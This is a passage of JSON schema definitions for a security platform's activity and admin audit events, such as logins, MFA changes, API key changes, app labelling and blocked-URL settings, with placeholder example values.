to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["ACTIVITY"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"employee@example.com uploaded file.exe to https://example.com/uploads"},"object":{"type":"string","enum":["FILE_UPLOAD"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"File upload"},"new":{"$ref":"#/components/schemas/FileUpload","description":"The new state of the object."}}},"id":"schema_626"},"schema_627":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["ACTIVITY"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com logged into https://login.com using a password"},"object":{"type":"string","enum":["LOGIN"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Login"},"new":{"$ref":"#/components/schemas/LoginEvent","description":"Login event details."}}},"id":"schema_627"},"schema_628":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed a login method for an account"},"object":{"type":"string","enum":["ACCOUNT_LOGIN_METHOD_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Account login method removed"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"accountId":{"type":"string","description":"The ID of the account.","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"accountEmail":{"type":"string","description":"The email address associated with the account.","example":"employee@example.com"},"appType":{"type":"string","description":"The name of the app.","example":"ATLASSIAN"},"loginMethod":{"type":"string","enum":["USERNAME_PASSWORD","OKTA_SWA","OIDC","SAML","FEDCM"],"description":"The login method removed from the account.","example":"OIDC"}},"required":["accountId","accountEmail","appType","loginMethod"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_628"},"schema_629":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com joined your team"},"object":{"type":"string","enum":["ADMIN_ACCEPTED_INVITATION"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Admin accepted invitation"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the user that performed the action."},"new":{"type":"object","properties":{"inviter":{"type":"string","description":"The email address of the admin that sent the invitation."}}}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_629"},"schema_630":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com enabled MFA on their Push account"},"object":{"type":"string","enum":["ADMIN_ENABLED_MFA"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Admin enabled MFA"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the user that performed the action."},"new":{"type":"object","properties":{"method":{"type":"string","enum":["APP_TOTP"],"description":"The MFA method used."}},"required":["method"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_630"},"schema_631":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com exported employee data"},"object":{"type":"string","enum":["ADMIN_EXPORTED_DATA"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Admin exported data"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the user that performed the action."},"new":{"type":"object","properties":{"entity":{"type":"string","description":"The entity that was exported.","enum":["APP","APP_OTHER","ACCOUNT","BROWSER","EMPLOYEE","OAUTH_APP"]},"arguments":{"type":"object","description":"The arguments used in the query."}},"required":["entity","arguments"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_631"},"schema_632":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event.\n\nNote: this is subject to change and should not be used to match on this object.\n","example":"user@example.com listed employees"},"object":{"type":"string","enum":["ADMIN_LOADED_DATA"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object.\n\nNote: this is subject to change and should not be used to match on this object.\n","example":"Admin loaded data"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the user that performed the action."},"new":{"type":"object","properties":{"query":{"type":"string","description":"The query performed to load the data."},"arguments":{"type":"object","description":"The arguments used in the query."}},"required":["query","arguments"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_632"},"schema_633":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com logged into the Push platform"},"object":{"type":"string","enum":["ADMIN_LOGGED_IN"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Admin logged in"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the user that performed the action."}},"required":["version","id","tenantId","timestamp","category","object","actor"]},"id":"schema_633"},"schema_634":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed another.user@example.com from your team"},"object":{"type":"string","enum":["ADMIN_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Admin removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that performed the deletion."},"new":{"type":"object","properties":{"target":{"type":"string","description":"The email address of the removed admin user."}},"required":["target"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_634"},"schema_635":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated the role for target@example.com to Read Only"},"object":{"type":"string","enum":["ADMIN_ROLE_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Admin role updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the user that performed the action."},"new":{"type":"object","properties":{"targetEmail":{"type":"string","description":"The email address of the admin user whose role was updated.","example":"target@example.com"},"role":{"$ref":"#/components/schemas/RoleType"}}}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_635"},"schema_636":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com configured a new API Key"},"object":{"type":"string","enum":["API_KEY_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"API key added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"name":{"type":"string","description":"A friendly name for the API Key, if one is chosen.","example":"CI/CD access"},"permissions":{"type":"string","description":"The permissions granted to the API key.","enum":["FULL_ACCESS","READ_ONLY"],"x-enumDescriptions":{"FULL_ACCESS":"Allows all request types to all endpoints in the API","READ_ONLY":"Allows only GET requests to the API"}}},"required":["permissions"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_636"},"schema_637":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed an existing API Key"},"object":{"type":"string","enum":["API_KEY_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"API key removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"name":{"type":"string","description":"A friendly name for the API Key, if one is chosen.","example":"CI/CD access"}}}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_637"},"schema_638":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated the app approval status"},"object":{"type":"string","enum":["APP_APPROVAL_STATUS_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"App approval status updated"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"appId":{"type":"string","description":"The ID of the app.","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"appType":{"type":"string","description":"The name of the app.","example":"ATLASSIAN"},"approvalStatus":{"type":"string","description":"The approval status of the app after the update.","nullable":true}},"required":["appId","appType","approvalStatus"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_638"},"schema_639":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added labels to apps"},"object":{"type":"string","enum":["APP_LABELS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"App labels added"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"labels":{"type":"array","items":{"type":"string"},"description":"The list of labels added."},"apps":{"type":"array","items":{"type":"string"},"description":"The list of apps that the labels were added to."}},"required":["labels","apps"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_639"},"schema_640":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed labels from apps"},"object":{"type":"string","enum":["APP_LABELS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"App labels removed"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"labels":{"type":"array","items":{"type":"string"},"description":"The list of labels removed."},"apps":{"type":"array","items":{"type":"string"},"description":"The list of apps the labels were removed from."}},"required":["labels","apps"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_640"},"schema_641":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated the app notes"},"object":{"type":"string","enum":["APP_NOTES_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"App notes updated"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"appId":{"type":"string","description":"The ID of the app.","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"appType":{"type":"string","description":"The name of the app.","example":"ATLASSIAN"},"notes":{"type":"string","description":"The notes of the app after the update."}},"required":["appId","appType","notes"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_641"},"schema_642":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated the app owner ID"},"object":{"type":"string","enum":["APP_OWNER_ID_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"App owner ID updated"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"appId":{"type":"string","description":"The ID of the app.","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"appType":{"type":"string","description":"The name of the app.","example":"ATLASSIAN"},"ownerId":{"type":"string","description":"The owner ID of the app after the update."}},"required":["appId","appType","ownerId"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_642"},"schema_643":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated the app sensitivity level"},"object":{"type":"string","enum":["APP_SENSITIVITY_LEVEL_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"App sensitivity level updated"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"appId":{"type":"string","description":"The ID of the app.","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"appType":{"type":"string","description":"The name of the app.","example":"ATLASSIAN"},"sensitivityLevel":{"type":"string","description":"The sensitivity level of the app after the update.","nullable":true}},"required":["appId","appType","sensitivityLevel"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_643"},"schema_644":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example toggled the auto-licensing setting to true"},"object":{"type":"string","enum":["AUTO_LICENSING_TOGGLED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Auto-licensing toggled"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that toggled the setting."},"new":{"type":"object","properties":{"enabled":{"type":"boolean","description":"Whether the auto-licensing setting is enabled or not."}},"required":["enabled"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_644"},"schema_645":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event.\n\nNote: this is subject to change and should not be used to match on this object.\n","example":"user@example.com enabled automatic unlicensing for 12 months"},"object":{"type":"string","enum":["AUTO_UNLICENSING_CONFIGURATION_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object.\n\nNote: this is subject to change and should not be used to match on this object.\n","example":"Automatic employee unlicensing configuration updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the user that performed the action."},"new":{"type":"object","properties":{"retentionPeriod":{"type":"object","description":"The retention period in months. This will be null if the Auto-unlicensing feature is disabled."}},"required":["retentionPeriod"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_645"},"schema_646":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added new blocked URLs"},"object":{"type":"string","enum":["BLOCKED_URLS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Blocked URLs added"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"urls":{"type":"array","items":{"type":"string"},"description":"A list of the added URLs."}},"required":["urls"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_646"},"schema_647":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed blocked URLs"},"object":{"type":"string","enum":["BLOCKED_URLS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Blocked URLs removed"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"urls":{"type":"array","items":{"type":"string"},"description":"A list of the removed URLs."}},"required":["urls"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_647"},"schema_648":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com toggled the URL schema obfuscation setting in the blocked URLs control"},"object":{"type":"string","enum":["BLOCKED_URLS_URL_SCHEMA_OBFUSCATION_TOGGLED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"URL schema obfuscation blocking setting toggled"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"}]},"new":{"type":"object","properties":{"url_schema_obfuscation":{"type":"boolean","description":"The new value of the URL schema obfuscation setting."}},"required":["url_schema_obfuscation"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_648"},"schema_649":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["BROWSER_EXTENSION_ENUMERATION_TOGGLED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Browser extension enumeration toggled"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example toggled browser extension enumeration to True"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"enabled":{"type":"boolean","description":"Whether the \"Browser extension 